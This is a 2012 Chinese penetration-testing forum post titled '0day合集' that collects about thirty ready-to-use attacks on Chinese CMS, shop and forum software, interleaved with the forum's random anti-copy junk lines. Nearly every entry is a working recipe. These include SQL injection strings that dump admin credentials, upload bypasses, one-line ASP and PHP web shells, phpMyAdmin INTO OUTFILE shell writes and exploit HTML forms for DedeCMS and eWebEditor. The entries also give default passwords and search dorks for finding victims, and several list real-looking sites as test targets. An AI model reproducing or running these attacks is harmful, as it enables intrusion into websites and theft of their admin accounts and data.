中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
, f( F a X/ c$ B( z! w6 u
- `% F% ^; ]+ x: ^! r1 _$ ]
直接上exploit:
3 z( \8 ?+ k ~
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
+ f* s# \, ] N/ V- b; _3 ]* H
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
8 d! @( e* R% U3 t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 W) R( j. S1 k0 B
Asprain论坛 注册用户 上传图片就可拿到webshell
4 l) `* Q, ] i! x8 ?
, n8 H$ p+ f Z" O. O) e
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
# c& _/ ?% b/ @. K* F. `; U2 z0 U
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
* o+ _8 Z5 t2 i% U7 N% }$ b
2.gif 为一小图片文件,一定要小,比如qq表情图片
1 J% U3 |: R+ D; G
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
% B* {; |: d6 V% v/ y
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
4 ?+ d7 o2 T- Y1 P7 g3 y
5.q.asp;.gif
* C; j2 F6 x' ]& P i6 j3 m4 \/ a
google:Powered by Asprain
7 I. L" h) ?, L3 t3 W* s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 v3 |# p! A, t& o5 e# z) X' m7 J
. N( b' ~( T, x2 U6 e5 U" `- r
ShopNum1全部系统存在上传漏洞。
0 L* _0 s, h: o5 [0 \/ @
# F$ f1 A( K* B V5 U
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
% J- A4 H" m; t
按说明 提示登录后台。。
+ l# f& [! U3 `8 \7 \: r8 W8 w
在后台功能页面->附件管理->附件列表
2 a. o1 J4 I0 s3 W% K$ L( e
可以直接上传.aspx 后缀木马
8 K* U! x& b- T; g7 }
http://demo.shopnum1.com/upload/20110720083822500.aspx
0 X& a/ ]8 P! h; b) |, ]3 ?5 l5 q) Z b# m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 {2 f! l4 o% f7 Q
' R7 s( l! @4 \) I+ I8 q2 B5 P
牛牛CMS中小企业网站管理系统 上传漏洞
3 C/ X' U( e Z$ q4 k
8 F- X" K% i$ ^& z% J
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
2 H F) o/ [& a
后台:admin/login.asp
+ Z. b4 ^, P. W" m: C/ c+ k
ewebeditor 5.5 Nday
$ }6 m1 u5 P, j. f
exp:
8 z# Q4 s* I8 Y7 H
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
" R8 e" w0 v: }
<input?type=file?name=uploadfile?size=100><br><br>?
/ K# t! ^+ c4 y2 S4 g
<input?type=submit?value=upload>?
: L& i- O; H c3 | \
</form>
* u: g. E; G9 i
ps:先上传小马.
6 ~, |, N+ v% D: F
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
2 l$ u7 F$ j, f) r0 ~0 J
5 `$ S5 U$ @6 O E7 `+ O8 u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 ~. {% I% r9 |6 G( @ E9 m
1 l& O2 k9 j4 U$ z0 S. F3 u" N
YothCMS 遍历目录漏洞
& U0 D' R" A& n) e* @! |
& w4 p! d1 S6 Z! v% r
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
* O& M% @- a0 t+ d8 i2 [/ d
默认后台:admin/login.asp
: d& _1 A7 Z% A5 s# y% d
遍历目录:
4 A6 l, B+ L7 V L' V$ e+ W/ l
ewebeditor/manage/upload.asp?id=1&dir=../
7 i! i7 }2 S2 N2 s) @3 Q; ]1 m
data:
; S( Z& Z+ j! H
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
) H' \+ }( d+ z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% q% j, O8 c0 V& S8 s
. m% C+ n" g* R: e: ?
Net112企业建站系统 1.0
) V6 b8 T. Y7 ?0 Y R
9 ~- E' R! x' {5 h8 s6 ?
源码简介:
6 q; a6 u) w! F, T
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
2 n8 |2 M9 B, Z2 y* Q3 s
添加管理员:
. L. j* |/ \9 D# ], W
http://www.0855.tv/admin/admin.asp?action=add&level=2
$ F0 a4 l( k( B0 Z. T( Z
其实加不加都不是很重要,后台文件都没怎么作验证。
* v* c0 Q Q3 X! [8 n
上传路径:
1 R: ^/ y$ ~6 N% E/ R# \
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
# K; h3 V$ \3 `& S& r9 _
http://www.0855.tv/inc/Upfile.asp?Stype=2
' P. A5 O" N6 a/ @0 t G! i
怎么利用自己研究。
9 P7 K8 B- m# n3 j8 W5 n- S; g
遍历目录:
- v' J" h; [# O+ U
http://www.0855.tv/admin/upfile.asp?path=../..
5 [' q5 U" a# g1 z- p
如:
6 L3 }% C# y' Q5 ] ]1 I" I. G
http://www.0855.tv/admin/upfile.asp?path=../admin
, v0 y2 u3 R3 W, I; {
http://www.0855.tv/admin/upfile.asp?path=../data
4 J' n% I/ g1 g2 a. t! G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 E; f. A9 D% I( X
8 z1 O9 X) {* x! a
易和阳光购物商城通杀 上传漏洞
) j) u: [2 k2 K4 [
4 F( @# u/ X# s, U$ r6 G F
前提要求是IIS6.0+asp坏境。
9 h5 q# b" }8 I
漏洞文件Iheeo_upfile.asp
4 ]- u9 `- o( [% X6 j/ G: ^
过滤不严.直接可以iis6.0上传
3 [+ C0 [1 s2 D$ v0 ^
把ASP木马改成0855.asp;1.gif
8 r1 o A" ]" c- O8 `0 o9 S, Q8 u, c7 P
直接放到明小子上传
! q" s' k1 z* h7 U5 ^% ~# N/ |
Google搜索:inurl:product.asp?Iheeoid=
r9 c9 _6 ?9 i2 a9 i/ ~, V( y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 g9 D' \4 |3 y( b0 O* t7 p, q9 ^7 v
! C' L6 c; ~5 p. z3 O3 {
phpmyadmin后台4种拿shell方法
0 b! @2 T1 x9 V& `: c) \7 J
8 i0 [. x. }8 C7 C( ~
方法一:
6 z/ M& [+ [! b& q1 V- z4 r
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
) E. I+ ]! q* D% Z& o0 c' A) @
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
1 J! Y a! t5 T1 o
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
; @ j' F' M6 M6 g$ F# F3 \ U* j+ G
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 O" ?6 Y# B' h4 _- @: A- z4 g
一句话连接密码:xiaoma
, Q4 h t+ B* ~& r
方法二:
1 x3 a2 x, d: ~9 I. G& F
Create TABLE xiaoma (xiaoma1 text NOT NULL);
$ X! h. t2 m1 G& Q
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
! V& d! F2 n0 J( b' g& U& X
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
0 Z. k! S! y8 I3 d
Drop TABLE IF EXISTS xiaoma;
' i' B/ h5 ]/ I
方法三:
" v1 o2 u/ r: c7 s
读取文件内容: select load_file('E:/xamp/www/s.php');
0 w# J# h* R; l4 Q2 [
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 V' `% s- A' b" c& s
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ V; I" |# M6 d2 l4 E D1 q
方法四:
1 F1 b7 q/ h- j! }$ M
select load_file('E:/xamp/www/xiaoma.php');
: y# I, V7 X/ q3 c7 o
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# o9 Q# i7 ?# e9 M& t3 \1 L$ g; S
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
! C ^: P [9 I, E! \7 x5 a
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# _) t* p4 M% x: }- v$ G
0 X7 T' P2 Z h0 E
传信网络独立开发网站源码0day漏洞
; y7 Q3 J1 _6 e* S2 e5 K
9 u3 S, e1 V1 m& z4 X
后台system/login.asp
: C5 l* D( N( D, {
进了后台有个ewebeditor
. E: q. P& Q4 J& F. k0 n, F' i
Google 搜索inurl:product1.asp?tyc=
) j5 o& [# @ u7 a$ h* [
编辑器漏洞默认后台ubbcode/admin_login.asp
$ P0 C p% q M- T6 x0 z
数据库ubbcode/db/ewebeditor.mdb
# `1 Y( x3 G: z- s( b
默认账号密码yzm 111111
/ g+ i9 [6 E! ?5 x
1 ^1 ~9 O- _, l& {5 A: V
拿webshell方法
( E, N. H- _; w( P9 x
登陆后台点击“样式管理”-选择新增样式
, V: m; J. H" h# @
样式名称:scriptkiddies 随便写
1 N+ Z6 V. e7 Z4 w6 r8 ]
路径模式:选择绝对路径
8 V. F6 U K. |) I J0 M
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
4 u! |7 W8 ?& M- p5 i; {0 n8 O" c
图片类型比如就是我们要上传的ASP木马格式
?/ d& w& J/ r$ e% H# c$ O
上传路径:/
) o( j+ O* T# N3 ?( W
图片限制:写上1000 免的上不了我们的asp木马
8 U, o4 w4 J% ]5 x+ ~
上传内容不要写
2 I! D$ g+ b& M8 |9 g2 j
可以提交了
& n7 [! i9 o4 q6 |
样式增加成功!
, {. i5 R" c! v1 r1 w
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
% `* @9 M$ G% n
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
( q; i! @* X+ D+ Z& N4 r
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
/ z% e. h$ p( W( H6 ~
上ASP木马 回车 等到路径
, b( q/ F- m P5 |$ f5 h& k
# `( K* ~* I" t: o1 Z6 e* K
后台:system/login.asp
" }2 q+ m3 B- v6 a
Exp:
5 G$ ^: D p8 b5 e
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
/ g0 X3 n8 t/ |" E- Y; ]5 A
测试:
" J: x; h9 ~ I9 U, y& ^6 p# d4 x% k) ]
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 M& c) e( w3 ?" v7 i0 ^
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
, N) r: m+ N: k: U2 o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ s: W! e4 |/ X: M0 g
l* Y7 ]: V# }: q U9 E2 W3 M
foosun 0day 最新注入漏洞
% l$ F- l& W T$ w* Z8 C. B9 B" s7 H
_7 o, O4 W, i* [' K) E0 J
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
/ i! U9 J) J! b# P
利用简单的方法:
: o" y/ t! z/ T1 L
暴管理员帐号:
8 R0 Y& y; y7 `4 y/ t$ }& e% X5 I
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
7 |2 `0 F- A, Q9 _! d
暴管理员密码:
8 _6 c* E% a+ H8 J1 K1 O
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
% C$ _1 s# D6 R) V/ A5 P- M' r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 K: E4 h! {' y% o4 @4 _
" C9 u3 p7 H1 h) K1 B" X9 X
网站程序的版权未知!
# {& o; _' k( ?2 T! g6 e
( l- o3 [6 V+ h+ s% @( }
默认网站数据库:
! {0 W9 F" U+ V4 k* H( P R$ Q# g
www.i0day.com/data/nxnews.mdb
7 P6 U9 x" i/ L# d+ i, z. ^
ewebeditor 在线编辑器:
- i3 C# b5 z" K, o
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
! J+ y- L6 t' ]" J% h) a' W r
登录地址:ewebeditor/admin_login.asp
0 M+ b+ m. H8 D6 g: \
默认密码:admin admin
% h# L! K$ N; v7 g! G
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# e q, o1 D4 G5 n# P& G5 H
y% i5 I0 k6 }7 p. p, k
Sql注入漏洞:
& i# v" u% A# V% W
http://www.i0day.com/detail.asp?id=12
2 ?. _. `7 u$ E" P3 k
exp:
. X- E" ?* Q! ~$ s; Z. }
union select 1,admin,password,4,5,6,7,8 from admin
! a' o6 D. |( `3 z6 b5 g9 b
爆出明文帐号/密码
$ C, q' t9 |; a8 L" H
- e* Q/ j2 k4 j
上传漏洞:
6 h$ q( ]/ B* B! V( F6 e% s
后台+upfile.asp
. [# F! A% F# d" o \( H4 C; w/ j
如:
" ^+ Y( I5 L& I
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
; W$ W, x, [8 u. R8 C. q% Q% e( i
shell的地址:网址+后台+成功上传的马
: j; V' \7 u) \# \- J1 V8 n
google:inurl:news.asp?lanmuName=
- w! @+ d2 E! l2 j: r' E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 W H4 e: V2 t( w6 v# J) z, m
+ W# J& {+ o1 B) y) ^ Z# V9 w
dedecms最新0day利用不进后台直接拿WEBSHELL
^0 ^6 J7 A" r9 \0 a
* M) Q( S: O* V$ G& R' o: u* e' L0 D
拿webshell的方法如下:
: F: S" X4 t/ g! d
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
) w; l9 I$ n* J' M* y
前题条件,必须准备好自己的dede数据库,然后插入数据:
# P) ], V e, W, o* Z, @, j
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
; p6 X/ V( M8 _% `8 y( t
, s$ R. H# z7 Y
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) h7 e7 @6 `) O/ Y; \5 ~
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
. }! W, q: }2 }+ p% p
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! n0 a' v: C# v
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
( h/ B) W& G" _ T' y9 z
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; h6 _7 J# E. |. d
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
% y' I% b6 N# c% f% e" {3 V
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- k8 s1 X; Y& K3 ^: e
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
# M1 _& O) z0 a9 u
<input type="text" value="true" name="nocache" style="width:400">
7 j* o- i$ Y2 u, x: k
<input type="submit" value="提交" name="QuickSearchBtn"><br />
" c- C- }: {+ C: C
</form>
& ^ y9 R4 N* {/ A9 q2 ^6 S6 |
<script>
) R' Z9 ~& ]0 c1 Y6 J6 ~
function addaction()
% B: ^1 _8 `5 t+ _ S
{
8 j$ {4 K* C: d6 j
document.QuickSearch.action=document.QuickSearch.doaction.value;
; j6 N3 [) u/ @- Q o$ o
}
. C% t8 ]$ H! V' V) f3 j P1 z
</script>
. ~ W9 W) b8 {; S) x- _% g
-----------------------------------------------------------------------------------------------------------------------------------------------
2 Q8 @ ?$ r; Z/ t' N, X
9 P- S* F# m( t" x: J6 _) N
dedecms织梦暴最新严重0day漏洞
. `" F4 l: N$ f/ j
bug被利用步骤如下:
! w# w1 L+ O( U& {
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; G* p/ E, J1 K; D
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 i/ m% h( b7 S3 ?
-------------------------------------------------------------------------------------------------------------------------------------------
0 e" X$ P. d1 D
/ b8 D! w3 Y0 o
多多淘宝客程序上传漏洞
" b2 F9 A, \: A* J6 x9 ?, X
漏洞页面:
0 W# I+ P+ X$ M6 q, y+ s% Q
admin\upload_pic.php
# ^% B: Y7 o- @1 E1 x$ n
传送门:
- U. Q. W5 s4 O! n% V- x
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
' m$ S0 P+ e( D% _' m
PS:copy张图片马 直接 xxx.php 上传抓包地址!
2 M4 W- {) V% p, E+ g
------------------------------------------------------------------------------------------------------------------------------------------------------
9 ~: S+ ^0 V2 d; k
. E! v3 [, L' j
无忧公司系统ASP专业版后台上传漏洞
; G* _6 ?7 D8 U& ]: F; @; ~. f
漏洞文件 后台上传
$ [, s1 e; Q$ D% ~! q8 K% W
admin/uploadPic.asp
8 \* v5 B) i& Z" y6 p r: h. A1 C: u
漏洞利用 这个漏洞好像是雷池的
# @4 Z, o* f6 R) \' F, r
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
( L, u7 p! ]4 n
等到的webshell路径:
' B3 M$ ]& J# x o- X
/UploadFiles/scriptkiddies.asp;_2.gif
+ D' T- p! M5 y! ]7 x
---------------------------------------------------------------------------------------------------------------------------------------------------
2 J0 Y& t6 X5 b. K6 V
) e1 N7 Q0 c4 o- ?0 o
住哪酒店分销联盟系统2010
. q* k4 W. H" Y X* T' E: v
Search:
7 m4 |6 e% ` L9 Y) e- E( e" [) A
inurl:index.php?m=hotelinfo
6 M; Q% u" S% l: q9 ~2 b
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
! w6 R( M* ~4 U
默认后台:index.php?m=admin/login
& M# G5 ? T9 v- C. _7 N
--------------------------------------------------------------------------------------------------------------------------------------------------
1 J$ h3 d% [5 P! M y) N
+ U' t" Q( k' z8 _2 v ?9 @: V
inurl:info_Print.asp?ArticleID=
4 X- U8 T3 W/ Y" ?! s! L/ F
后台 ad_login.asp
4 n" K( a; d( w& h
爆管理员密码:
s) \( @! D# s" v! A+ ^0 k
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
6 V7 W; Z( e2 ?
------------------------------------------------------------------------------------------------------------------------------------------------------------
+ s5 D' m* u$ s7 a3 U" b& e
% ] n% q# V$ r% ~% C2 M7 e
搜索框漏洞!
' E# |# j* n8 w: L# l. X
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
. v" d: \0 i/ j" ]: T/ P2 c, Q) q
--------------------------------------------------------------------------------------------------------------------------------------------------------
' d' B+ F9 p+ r7 M2 N" k" M
- e3 m( N8 Q% N. t+ u# P
关键字:
( ` p! g1 t% R' w/ B9 z
inurl:/reg_TemletSel.asp?step=2
2 J+ z4 f3 J0 R$ @' x
或者
; j6 p0 X; U- V6 c# s% }
电子商务自助建站--您理想的助手
0 i/ n* a8 w4 M" P; G7 T
-------------------------------------------------------------------------------------------------------------------------------------------------
2 H3 u5 q) ~& {. X* _8 {( L+ e, s
8 `& c9 R2 b5 E
iGiveTest 2.1.0注入漏洞
$ D! t/ a- V1 F
Version: <= 2.1.0
( F7 j0 H& r8 P! H1 k
# Homepage:
http://iGiveTest.com/
5 [. {& G" K6 ^" F7 W; X9 ^
谷歌关键字: “Powered by iGiveTest”
$ a0 E$ e/ `0 b+ V3 q" Q: q/ U' o& U! s
随便注册一个帐号。然后暴管理员帐号和密码
+ G8 G3 G% `% B9 O# M( N
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
- @0 ?' k Y, `3 u1 V1 Y" ]' L; V
------------------------------------------------------------------------------------------------------------------------------------------------
2 Q6 E- W3 _% f) b
$ |' }) Q1 Z+ d0 F1 ^: A
CKXP网上书店注入漏洞
6 W# w8 K' U/ v4 T# A/ X8 u
工具加表:shop_admin 加字段:admin
( @. _- B# c0 }
后台:admin/login.asp
|1 @! }) j* W- v
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" p( X# }+ f* a# x: |$ Z
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ B- f5 s( \3 B" k) x9 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, M- Y# k6 T& ]0 q- I$ h7 ~& s
+ e3 L* c0 Q' y3 g+ p% m% T( y0 `
段富超个人网站系统留言本写马漏洞
& r2 p5 K$ N, Y$ l& ]1 O
源码下载:
http://www.mycodes.net/24/2149.htm
* ?0 V! i8 R1 M- v2 h- C, R
addgbook.asp 提交一句话。
) u% n' C) N6 x. r+ I' x7 |# P
连接:
http://www.xxxx.tv/date/date3f.asp
. }& r% `1 E( Q1 _9 ]
google:为防批量,特略!
- J( q$ Z0 o8 {
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 I) {/ ^8 A: ]
; n W" L9 {1 \# c
智有道专业旅游系统v1.0 注入及列目录漏洞
- V0 N; b; n$ o
默认后台路径:/admin/login.asp
" {$ p% W8 V& Y# M+ P+ v
默认管理员:admin
% l( d* v3 c5 `+ N
默认密码:123456
- K$ M) P! A# c
SQL EXP Tset:
8 ~& [! _' u2 H5 n
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
. p+ S( o0 m% k. M6 @3 T
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! k9 K" J. z: g9 ]+ p4 D# p, ^% u
2 I; Y, `3 J: u% }+ i! H/ u
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
/ }/ f5 T' F/ i" j. N0 ^
EXP:
; T- Q% A" k: w' ]
<title>eWebeditoR3.8 for php任意文件上EXP</title>
3 N, g/ H% T. R c7 i# I% c
<form action="" method=post enctype="multip
- `( J" A9 q, F( j, m8 f1 z' h' u
art/form-data">
2 _4 q3 X6 W% g7 U0 r; c
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
^9 T$ D i/ V
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
" Z7 T) w7 i5 p) ^* `% o U
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
) k! ~6 N9 e& K1 M: \6 }* y/ {
file:<input type=file name="uploadfile"><br>
" l: s* } r5 Z; c) F
<input type=button value=submit onclick=fsubmit()>
1 V5 w x! @1 Y
</form><br>
! \9 I7 z+ g+ O9 `. p1 R
<script>
! W8 |9 y5 Z, X9 f9 g$ B
function fsubmit(){
, \) J2 o/ j4 y1 Z- X4 d
form = document.forms[0];
1 J/ }6 e3 Q2 F- Q8 ~
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 v6 Q& Q5 R3 y) _8 [
alert(form.action);
- U6 R% a' [: e! r4 e3 a: ?
form.submit();
. I7 b0 g) t$ V; M
}
4 w- o3 J E* Z. n1 n" R/ m$ _, ]
</script>
1 s- U! u$ H ?9 _$ {+ r
注意修改里面ewebeditor的名称还有路径。
+ w* _( h8 n3 q- d
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ?" t' A: n! t% i
# x# H4 M0 @0 j1 W( d
提交’时提示ip被记录 防注入系统的利用
+ N1 z$ `' m2 ~
网址:
http://www.xxx.com/newslist.asp?id=122
′
! b7 n, y2 H4 }) w& W" l
提示“你的操作已被记录!”等信息。
& _5 {; |8 F0 y
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
3 \ c" K4 C( R; w+ l4 B. V" G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* r) p$ q ?' W3 x9 s6 a/ S
$ `1 A0 p( ~- V0 A- b
西部商务网站管理系统 批量拿shell-0day
7 L2 D' s+ P: S- W
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
5 n0 N' }% Z1 _; _+ X0 U2 h
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
! z# k/ W& P! D5 g% s" D
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
, m( M* {" t" F; x
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
$ s* |- Z* P, t! L+ y8 s
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: A: Z" |# M9 u' p
% ~+ S9 S: m- I4 {9 T
JspRun!6.0 论坛管理后台注入漏洞
7 |. F a2 a+ n# j1 [; K! U
7 y, X" P4 q; C. |
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
1 e& M! M2 S, \) K2 v% F8 X. r
JspRun!6.0
{" Y# m" H, |2 C% t
漏洞描述:
! N e" e/ G5 N" r, W' t
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
3 ?- K, }( P8 L* d
在处理后台提交的文件中ForumManageAction.java第1940行
- u6 |& i: M+ u: k: D5 X
String export = request.getParameter("export");//直接获取,没有安全过滤
& C% d. x' k$ a5 f+ H/ e: y
if(export!=null){
5 X+ C t8 {7 D$ E# {: `
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
% { ~ n& W+ e3 i8 [+ _
if(styles==null||styles.size()==0){
4 A6 H* @; _) w( X( ^ D2 A& F
<*参考
" v2 N+ C! }2 ]1 D% m# S0 J& ^* g
nuanfan@gmail.com
+ K' e7 U; H, X
*> SEBUG安全建议:
- v2 G2 k) h) |; F6 L0 L- b3 L
www.jsprun.net
% V9 t4 D1 Z# e, v. |% G/ ~1 P
(1)安全过滤变量export
- L2 ?; o1 ^0 n8 f' \* m4 ^
(2)在查询语句中使用占位符
3 K. E+ _4 g% q) J
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' c: e$ A% e8 @% k, w* m
, T3 g( v8 H* E/ z% j
乌邦图企业网站系统 cookies 注入
& g d' p8 c$ o6 ?! x
, l+ Z/ z: j f6 ]5 q
程序完整登陆后台:/admin/login.asp
Q8 ^9 ~* y1 X- s2 S
默认登陆帐号:admin 密码:admin888
) ~% m; w t' M0 S
语句:(前面加个空格)
* G$ O' q0 x8 S- H
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
( m! G" @! k1 ]' D3 v
或者是16个字段:
0 ?3 D: c4 I0 S" ]7 r0 T* O% _
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% o" ~# S% [; I2 R( k
爆不出来自己猜字段。
) c/ Q9 [' `2 Q5 [6 P6 s
注入点:
http://www.untnt.com/shownews.asp?=88
% G# V% G0 j% ]$ r9 p+ ^) Q v, M
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
9 K5 r1 ]* x; I
关键字:
" q0 C3 f0 U- M7 Q$ e2 H
inurl:shownews?asp.id=
5 X4 M; z( y( u1 ?3 b
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 p* o# p( B4 V/ t7 ]- R. C
' ]- i: k4 w6 {
CKXP网上书店注入漏洞
+ M5 W" ~0 J t& v/ h, @- f9 }
8 p6 T. u M& n
工具加表:shop_admin 加字段:admin
4 k$ B, @) Q+ G; s
后台:admin/login.asp
8 g* F+ L5 [1 a
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
) @9 T/ v5 C3 B, U# S5 c! X
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
